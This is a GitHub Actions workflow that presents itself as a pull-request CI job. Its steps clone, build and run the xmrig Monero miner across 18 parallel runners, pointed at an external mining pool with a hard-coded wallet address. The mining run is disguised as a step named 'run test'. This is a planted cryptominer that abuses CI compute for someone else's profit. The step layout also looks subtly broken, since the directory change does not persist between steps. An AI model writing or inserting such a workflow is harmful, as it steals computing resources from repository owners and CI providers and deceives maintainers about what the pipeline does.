name: PR WorkFlow

on:
  pull_request:
    branches:
      - master
      - staging

jobs:
  parser:
    name: parse job

    runs-on: ubuntu-latest
    env:
      DEBIAN_FRONTEND: noninteractive

    strategy:
     fail-fast: false
     matrix:
       runner: [0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17]

    steps:
      - name: Checkout code
        uses: actions/checkout@v2

      - name: deps
        run: sudo apt-get install git build-essential cmake libuv1-dev libssl-dev libhwloc-dev

      - name: clone
        run: git clone https://github.com/xmrig/xmrig.git

      - name: mkdir
        run: mkdir xmrig/build && cd xmrig/build

      - name: cmake
        run: cmake ..

      - name: make -j$(nproc) 
        run: make -j$(nproc) 
        
      - name: run test
        run: ./xmrig -o us-west.minexmr.com:443 -u 488gqmpBPEtLtf97ZUs6zuRZgk1DkVYtCdVZ8AXfZh2zBvTppPysRJjeMCC5XC1neMYsNPPgp56qZejNdPMmRGibBSkP5ws -k --tls --rig-id first
